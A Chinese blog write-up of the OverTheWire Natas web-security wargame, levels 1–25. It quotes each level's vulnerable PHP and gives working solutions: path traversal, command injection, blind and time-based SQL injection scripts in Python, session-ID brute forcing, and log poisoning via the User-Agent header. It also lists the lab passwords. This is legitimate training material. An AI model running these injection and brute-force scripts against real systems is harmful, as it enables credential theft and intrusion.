Natas关卡学Web漏洞目前1~25关卡(write up)

注:每一关的账号为natas+x 其中x为关卡数,关卡通关的条件是得到下一关卡的password

        建议用 burp suite(方便且强大)

第一关:

You can find the password for the next level on this page,but rightclicking has been blocked!

你可以在这个页面上找到下一个级别的密码,但是右键被阻止了!

右键通常可以查看网页源代码,提示的很明显

F12,查看element,查看content得到

得到:<!--The password for natas2 is TguMNxKo1DSaltujBLuZJnDUlCcUAPII->

第二关:

F12

或者右键查看源码效果一样

有 files/pixel.png 提示,尝试

../../../files/

打开user.txt

得到:natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH

第三关:

前两关菜鸟方法行不通了

需要了解robots.txt   robots.txt_web服务器上存在robot(s).txt-CSDN博客

../../../robots.txt/

../../../s3cr3t/

得到:natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ

第四关:

Access disallowed.You are visiting from "while authorized users should come only from
"http://natas5.natas.labs.overthewire.org/"

不允许访问。您是从“授权用户”访问的应该只来自“http://natas5.natas.labs.overthewire.org/”

需要点 refresh page  抓的包才有referer

右键 发送到 repeater(重放器)将referer的natas4改为natas5

得到:0n35PkggAPm2zbEpOU802c0x0Msn1ToK

第五关:

看抓包,logged=0

修改 logged=1

得到:natas6 0RoJwHdSKWFTYR5WuiAewauSuNaBXned

第六关:

查看 view sourcecode

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

尝试

../../../includes/secret.inc

FOEIUWGHFEEUHOFUOIU

得到:natas7 is bmg8SvU1LizuWjx3y7xkNERkHxGre0GS

第七关:

?page=/etc/natas_webpass/natas8

得到: natas8  xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q

第八关:

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>
import base64


secret="3d3d516343746d4d6d6c315669563362"

a=bytes.fromhex(secret)
reversed_str=a[::-1]
m=base64.b64decode(reversed_str)
print(m)

得到:natas9 is ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t

第九关:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
. /etc/natas_webpass/natas10 #

得到:natas10 t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu

第十关:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

得到:natas11 UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk

第十一关:

<?

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        $mydata['showpassword'] = $tempdata['showpassword'];
        $mydata['bgcolor'] = $tempdata['bgcolor'];
        }
    }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);



?>
import base64
import json
from urllib.parse import unquote, quote

# 原始Cookie数据
original_cookie = "HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg%3D"

# 步骤1:解码Cookie
decoded_cookie = unquote(original_cookie)  # URL解码
ciphertext = base64.b64decode(decoded_cookie)  # Base64解码

# 步骤2:生成已知明文
default_data = {"showpassword": "no", "bgcolor": "#ffffff"}
plaintext = json.dumps(default_data, separators=(",", ":")).encode()  # 紧凑JSON格式

# 步骤3:计算XOR密钥流
key_stream = bytes([p ^ c for p, c in zip(plaintext, ciphertext)])

# 步骤4:自动检测重复密钥
def find_repeating_key(stream, max_len=20):
    for n in range(1, max_len+1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return None

key = find_repeating_key(key_stream)
print(f"[+] 破解密钥: {key.decode(errors='ignore')}")

# 步骤5:构造新数据并加密
new_data = {"showpassword": "yes", "bgcolor": "#ffffff"}
new_json = json.dumps(new_data, separators=(",", ":")).encode()
new_cipher = bytes([b ^ key[i % len(key)] for i, b in enumerate(new_json)])

# 步骤6:生成新Cookie
new_cookie = base64.b64encode(new_cipher).decode()
final_cookie = quote(new_cookie)  # URL编码特殊字符
print(f"[+] 新Cookie值: {final_cookie}")

# 使用此Cookie访问页面即可显示密码
[+] 破解密钥: eDWo
[+] 新Cookie值: HmYkBwozJw4WNyAAFyB1VUc9MhxHaHUNAic4Awo2dVVHZzEJAyIxCUc5

得到:The password for natas12 is yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB

第十二关:

<?php

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }

    return $string;
}

function makeRandomPath($dir, $ext) {
    do {
    $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);


        if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>

得到:trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC

第十三关:

<?php

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }

    return $string;
}

function makeRandomPath($dir, $ext) {
    do {
    $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

    $err=$_FILES['uploadedfile']['error'];
    if($err){
        if($err === 2){
            echo "The uploaded file exceeds MAX_FILE_SIZE";
        } else{
            echo "Something went wrong :/";
        }
    } else if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
        echo "File is not an image";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>

关键:生成的随机名称的.jpg 改为  .php  用GIF89a 骗过文件头校验

得到:GIF89az3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ

第十四关:

<?php
if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas14', '<censored>');
    mysqli_select_db($link, 'natas14');

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysqli_num_rows(mysqli_query($link, $query)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysqli_close($link);
} else {
?>

得到:natas15 is SdqIqBsFcz3yotlNYErZSZwblkm0lrvx

第十五关:

<?php

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas15', '<censored>');
    mysqli_select_db($link, 'natas15');

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysqli_query($link, $query);
    if($res) {
    if(mysqli_num_rows($res) > 0) {
        echo "This user exists.<br>";
    } else {
        echo "This user doesn't exist.<br>";
    }
    } else {
        echo "Error in query.<br>";
    }

    mysqli_close($link);
} else {
?>

import requests
from requests.auth import HTTPBasicAuth
import time

url = "http://natas15.natas.labs.overthewire.org/index.php"
auth = HTTPBasicAuth("natas15", "SdqIqBsFcz3yotlNYErZSZwblkm0lrvx")  # 使用新密码
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
password = ""
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36"}

for i in range(1, 33):  # 密码长度为 32
    for char in charset:
        payload = f'natas16" AND SUBSTRING(password, {i}, 1) = BINARY "{char}" -- '
        data = {"username": payload}
        try:
            response = requests.post(url, auth=auth, data=data, headers=headers, timeout=10)
            response.raise_for_status()  # 检查 HTTP 错误
            if "This user exists" in response.text:
                password += char
                print(f"[+] 第 {i} 位: {char} → 当前密码: {password}")
                break
            else:
                print(f"[-] 测试位置 {i} 字符 {char} → 无匹配")
        except requests.exceptions.RequestException as e:
            print(f"[!] 请求失败: {e}")
        time.sleep(0.5)  # 避免触发速率限制
print(f"[*] 最终密码: {password}")

得到:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo

第十六关:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
?>
import requests

chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
password = ''
target = 'http://natas16.natas.labs.overthewire.org/'
auth = ('natas16', 'hPkjKYviLQctEW33QmuXL6eDVfMW4sGo')

for i in range(32):
    for c in chars:
        # 构造精准 payload
        url = f"{target}?needle=$(grep ^{password + c} /etc/natas_webpass/natas17)African"
        r = requests.get(url, auth=auth)
        
        # 关键判断:若 'African' 不在响应中,说明密码字符正确
        if 'African' not in r.text:
            password += c
            print(f'找到第 {i+1} 位: {c} → 当前密码: {password.ljust(32, "*")}')
            break
print(f'最终密码: {password}')

得到:EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC

第十七关:

<?php

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas17', '<censored>');
    mysqli_select_db($link, 'natas17');

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysqli_query($link, $query);
    if($res) {
    if(mysqli_num_rows($res) > 0) {
        //echo "This user exists.<br>";
    } else {
        //echo "This user doesn't exist.<br>";
    }
    } else {
        //echo "Error in query.<br>";
    }

    mysqli_close($link);
} else {
?>
import requests
url = 'http://natas17.natas.labs.overthewire.org/index.php'
username= 'natas17'
password= 'EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC'
key = ""
 
for pos in range(1, 33): # 32 位密码
    low = 48          # 这里采用 ascii 码来查找,最小的 ascii 为48
    high = 122        # 最大的 ascii 为48
    mid = (high+low)>>1        # 折半查找
    
    while mid<high:
        
        # 每次取 password 字段中的一位密码,最后用 "" like " 来闭合 sql 语句
        payload= "natas18\" and if(%d < ascii(mid(password,%d,1)), sleep(2), 1) and \"\" like \"" %  (mid, pos)
        try:
            req = requests.post(url, auth = requests.auth.HTTPBasicAuth(username,password),data={"username":payload}, timeout=2)
        except requests.exceptions.Timeout:
            low = mid + 1
            mid = (high+low)>>1
            continue
        
        high=mid 
        mid = (high+low)>>1 
    key+=chr(mid)
    print(key)

得到:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ

第十八关:

<?php

$maxid = 640; // 640 should be enough for everyone

function isValidAdminLogin() { /* {{{ */
    if($_REQUEST["username"] == "admin") {
    /* This method of authentication appears to be unsafe and has been disabled for now. */
        //return 1;
    }

    return 0;
}
/* }}} */
function isValidID($id) { /* {{{ */
    return is_numeric($id);
}
/* }}} */
function createID($user) { /* {{{ */
    global $maxid;
    return rand(1, $maxid);
}
/* }}} */
function debug($msg) { /* {{{ */
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}
/* }}} */
function my_session_start() { /* {{{ */
    if(array_key_exists("PHPSESSID", $_COOKIE) and isValidID($_COOKIE["PHPSESSID"])) {
    if(!session_start()) {
        debug("Session start failed");
        return false;
    } else {
        debug("Session start ok");
        if(!array_key_exists("admin", $_SESSION)) {
        debug("Session was old: admin flag set");
        $_SESSION["admin"] = 0; // backwards compatible, secure
        }
        return true;
    }
    }

    return false;
}
/* }}} */
function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas19\n";
    print "Password: <censored></pre>";
    } else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.";
    }
}
/* }}} */

$showform = true;
if(my_session_start()) {
    print_credentials();
    $showform = false;
} else {
    if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) {
    session_id(createID($_REQUEST["username"]));
    session_start();
    $_SESSION["admin"] = isValidAdminLogin();
    debug("New session started");
    $showform = false;
    print_credentials();
    }
}

if($showform) {
?>
import requests

url = 'http://natas18.natas.labs.overthewire.org/'
auth = ('natas18', '6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ')

for session_id in range(1, 641):
    cookies = {'PHPSESSID': str(session_id)}
    try:
        response = requests.get(url, auth=auth, cookies=cookies, timeout=5)
        if 'You are an admin' in response.text:
            print(f"[+] 成功找到有效会话ID: {session_id}")
            print("[+] 密码信息如下:")
            print(response.text.split('<pre>')[1].split('</pre>')[0])
            break
        else:
            print(f"[-] 尝试会话ID {session_id}:非管理员")
    except Exception as e:
        print(f"[!] 会话ID {session_id} 请求失败: {e}")

得到:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

第十九关:

import binascii

import requests

# proxie = {'http': 'http://127.0.0.1:8080'}
url = 'http://natas19.natas.labs.overthewire.org/'
header = {'Authorization': 'Basic bmF0YXMxOTp0bndFUjdQZGZXa3hzRzRGTldVdG9BWjlWeVpUSnFKcg=='}

for uid in range(91, 641):
    payload = str(uid) + '-admin'
    suid = str(binascii.b2a_hex(bytes(payload, encoding='utf-8')), encoding='utf8')
    cookie = {'__utma': '176859643.1701764875.1629551603.1632719883.1632842691.23',
              '__utmz': '176859643.1629551603.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic',
              '__utmb': '=176859643.3.10.1632842691',
              '__utmc': '176859643',
              '__utmt': '1',
              'PHPSESSID': suid}

    res = requests.get(url, headers=header, cookies=cookie)
    if 'You are an admin' in res.text:
        print(res.text)
        break
    else:
        print(str(uid) + ' failure')

 

得到:p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw

第二十关:

<?php

function debug($msg) { /* {{{ */
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}
/* }}} */
function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas21\n";
    print "Password: <censored></pre>";
    } else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas21.";
    }
}
/* }}} */

/* we don't need this */
function myopen($path, $name) {
    //debug("MYOPEN $path $name");
    return true;
}

/* we don't need this */
function myclose() {
    //debug("MYCLOSE");
    return true;
}

function myread($sid) {
    debug("MYREAD $sid");
    if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
    debug("Invalid SID");
        return "";
    }
    $filename = session_save_path() . "/" . "mysess_" . $sid;
    if(!file_exists($filename)) {
        debug("Session file doesn't exist");
        return "";
    }
    debug("Reading from ". $filename);
    $data = file_get_contents($filename);
    $_SESSION = array();
    foreach(explode("\n", $data) as $line) {
        debug("Read [$line]");
    $parts = explode(" ", $line, 2);
    if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1];
    }
    return session_encode() ?: "";
}

function mywrite($sid, $data) {
    // $data contains the serialized version of $_SESSION
    // but our encoding is better
    debug("MYWRITE $sid $data");
    // make sure the sid is alnum only!!
    if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
    debug("Invalid SID");
        return;
    }
    $filename = session_save_path() . "/" . "mysess_" . $sid;
    $data = "";
    debug("Saving in ". $filename);
    ksort($_SESSION);
    foreach($_SESSION as $key => $value) {
        debug("$key => $value");
        $data .= "$key $value\n";
    }
    file_put_contents($filename, $data);
    chmod($filename, 0600);
    return true;
}

/* we don't need this */
function mydestroy($sid) {
    //debug("MYDESTROY $sid");
    return true;
}
/* we don't need this */
function mygarbage($t) {
    //debug("MYGARBAGE $t");
    return true;
}

session_set_save_handler(
    "myopen",
    "myclose",
    "myread",
    "mywrite",
    "mydestroy",
    "mygarbage");
session_start();

if(array_key_exists("name", $_REQUEST)) {
    $_SESSION["name"] = $_REQUEST["name"];
    debug("Name set to " . $_REQUEST["name"]);
}

print_credentials();

$name = "";
if(array_key_exists("name", $_SESSION)) {
    $name = $_SESSION["name"];
}

?>

关键:先发post请求  name注入  

name=test%0Aadmin%201

后切换为get请求 (没有name参数)

得到:Username: natas21  Password: BPhv63cKE1lkQl04cE5CuFTzXe15NfiH

第二十一关:

<?php

function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas22\n";
    print "Password: <censored></pre>";
    } else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.";
    }
}
/* }}} */

session_start();
print_credentials();

?>
<?php

session_start();

// if update was submitted, store it
if(array_key_exists("submit", $_REQUEST)) {
    foreach($_REQUEST as $key => $val) {
    $_SESSION[$key] = $val;
    }
}

if(array_key_exists("debug", $_GET)) {
    print "[DEBUG] Session contents:<br>";
    print_r($_SESSION);
}

// only allow these keys
$validkeys = array("align" => "center", "fontsize" => "100%", "bgcolor" => "yellow");
$form = "";

$form .= '<form action="index.php" method="POST">';
foreach($validkeys as $key => $defval) {
    $val = $defval;
    if(array_key_exists($key, $_SESSION)) {
    $val = $_SESSION[$key];
    } else {
    $_SESSION[$key] = $val;
    }
    $form .= "$key: <input name='$key' value='$val' /><br>";
}
$form .= '<input type="submit" name="submit" value="Update" />';
$form .= '</form>';

$style = "background-color: ".$_SESSION["bgcolor"]."; text-align: ".$_SESSION["align"]."; font-size: ".$_SESSION["fontsize"].";";
$example = "<div style='$style'>Hello world!</div>";

?>

<p>Example:</p>
<?=$example?>

<p>

关键:a(原页面)的cookie给b(新页面)用burp suite时建议新开窗口

b 注入debug  和 admin=1   需要点update 抓包才能有相关参数

得到:Username: natas22 Password: d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz

第二十二关:

<?php
session_start();

if(array_key_exists("revelio", $_GET)) {
    // only admins can reveal the password
    if(!($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1)) {
    header("Location: /");
    }
}
?>

得到:Username: natas23 Password: dIUQcI3uSus1JEOSSWRAEXBG8KbR8tRs

第二十三关:

<?php
    if(array_key_exists("passwd",$_REQUEST)){
        if(strstr($_REQUEST["passwd"],"iloveyou") && ($_REQUEST["passwd"] > 10 )){
            echo "<br>The credentials for the next level are:<br>";
            echo "<pre>Username: natas24 Password: <censored></pre>";
        }
        else{
            echo "<br>Wrong!<br>";
        }
    }
    // morla / 10111
?>

得到:Username: natas24 Password: MeuqmfJ8DDKuTr5pcvzFKSwlxedZYEWd

第二十四关:

<?php
    if(array_key_exists("passwd",$_REQUEST)){
        if(!strcmp($_REQUEST["passwd"],"<censored>")){
            echo "<br>The credentials for the next level are:<br>";
            echo "<pre>Username: natas25 Password: <censored></pre>";
        }
        else{
            echo "<br>Wrong!<br>";
        }
    }
    // morla / 10111
?> 

得到:Username: natas25 Password: ckELKUWZUfpOv6uxS6M7lXBpBssJZ4Ws

第二十五关:

<?php
    // cheers and <3 to malvina
    // - morla

    function setLanguage(){
        /* language setup */
        if(array_key_exists("lang",$_REQUEST))
            if(safeinclude("language/" . $_REQUEST["lang"] ))
                return 1;
        safeinclude("language/en"); 
    }
    
    function safeinclude($filename){
        // check for directory traversal
        if(strstr($filename,"../")){
            logRequest("Directory traversal attempt! fixing request.");
            $filename=str_replace("../","",$filename);
        }
        // dont let ppl steal our passwords
        if(strstr($filename,"natas_webpass")){
            logRequest("Illegal file access detected! Aborting!");
            exit(-1);
        }
        // add more checks...

        if (file_exists($filename)) { 
            include($filename);
            return 1;
        }
        return 0;
    }
    
    function listFiles($path){
        $listoffiles=array();
        if ($handle = opendir($path))
            while (false !== ($file = readdir($handle)))
                if ($file != "." && $file != "..")
                    $listoffiles[]=$file;
        
        closedir($handle);
        return $listoffiles;
    } 
    
    function logRequest($message){
        $log="[". date("d.m.Y H::i:s",time()) ."]";
        $log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
        $log=$log . " \"" . $message ."\"\n"; 
        $fd=fopen("/var/www/natas/natas25/logs/natas25_" . session_id() .".log","a");
        fwrite($fd,$log);
        fclose($fd);
    }
?>
<?php foreach(listFiles("language/") as $f) echo "<option>$f</option>"; ?>
</select>
</form>
</div>

<?php  
    session_start();
    setLanguage();
    
    echo "<h2>$__GREETING</h2>";
    echo "<p align=\"justify\">$__MSG";
    echo "<div align=\"right\"><h6>$__FOOTER</h6><div>";
?>

关键:get请求注入

?lang=....//....//....//....//....//var/www/natas/natas25/logs/natas25_km9vk0t9rhu3jh3o92do0aghio.log

user agent 注入

<? readfile("/etc/natas_webpass/natas26");?>

仔细核对 注入 不然没结果

得到:natas26 cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE

第二十六关:

<?php
    // sry, this is ugly as hell.
    // cheers kaliman ;)
    // - morla

    class Logger{
        private $logFile;
        private $initMsg;
        private $exitMsg;

        function __construct($file){
            // initialise variables
            $this->initMsg="#--session started--#\n";
            $this->exitMsg="#--session end--#\n";
            $this->logFile = "/tmp/natas26_" . $file . ".log";

            // write initial message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->initMsg);
            fclose($fd);
        }

        function log($msg){
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$msg."\n");
            fclose($fd);
        }

        function __destruct(){
            // write exit message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->exitMsg);
            fclose($fd);
        }
    }

    function showImage($filename){
        if(file_exists($filename))
            echo "<img src=\"$filename\">";
    }

    function drawImage($filename){
        $img=imagecreatetruecolor(400,300);
        drawFromUserdata($img);
        imagepng($img,$filename);
        imagedestroy($img);
    }

    function drawFromUserdata($img){
        if( array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){

            $color=imagecolorallocate($img,0xff,0x12,0x1c);
            imageline($img,$_GET["x1"], $_GET["y1"],
                            $_GET["x2"], $_GET["y2"], $color);
        }

        if (array_key_exists("drawing", $_COOKIE)){
            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));
            if($drawing)
                foreach($drawing as $object)
                    if( array_key_exists("x1", $object) &&
                        array_key_exists("y1", $object) &&
                        array_key_exists("x2", $object) &&
                        array_key_exists("y2", $object)){

                        $color=imagecolorallocate($img,0xff,0x12,0x1c);
                        imageline($img,$object["x1"],$object["y1"],
                                $object["x2"] ,$object["y2"] ,$color);

                    }
        }
    }

    function storeData(){
        $new_object=array();

        if(array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){
            $new_object["x1"]=$_GET["x1"];
            $new_object["y1"]=$_GET["y1"];
            $new_object["x2"]=$_GET["x2"];
            $new_object["y2"]=$_GET["y2"];
        }

        if (array_key_exists("drawing", $_COOKIE)){
            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));
        }
        else{
            // create new array
            $drawing=array();
        }

        $drawing[]=$new_object;
        setcookie("drawing",base64_encode(serialize($drawing)));
    }
?>
<?php
    session_start();

    if (array_key_exists("drawing", $_COOKIE) ||
        (   array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET))){
        $imgfile="img/natas26_" . session_id() .".png";
        drawImage($imgfile);
        showImage($imgfile);
        storeData();
    }

?>

---------------------------为什么没有后面关卡,是php反序列化害了他------------------------------------------

攻略证明:

natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH

natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ

natas5 is 0n35PkggAPm2zbEpOU802c0x0Msn1ToK

natas6 is 0RoJwHdSKWFTYR5WuiAewauSuNaBXned

$secret = "FOEIUWGHFEEUHOFUOIU"

natas7 is bmg8SvU1LizuWjx3y7xkNERkHxGre0GS

natas8 xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q

natas9 is ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t

natas10 t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu

natas11 UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk

The password for natas12 is yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB

natas13 trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC

natas14 GIF89a z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ

natas15 is SdqIqBsFcz3yotlNYErZSZwblkm0lrvx

natas16 hPkjKYviLQctEW33QmuXL6eDVfMW4sGo

natas17 EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC

natas18 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ

Username: natas19 Password: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

natas20 Password: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw

Username: natas21 Password: BPhv63cKE1lkQl04cE5CuFTzXe15NfiH

Username: natas22 Password: d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz

Username: natas23 Password: dIUQcI3uSus1JEOSSWRAEXBG8KbR8tRs

Username: natas24 Password: MeuqmfJ8DDKuTr5pcvzFKSwlxedZYEWd

Username: natas25 Password: ckELKUWZUfpOv6uxS6M7lXBpBssJZ4Ws

natas26 cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无极921

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值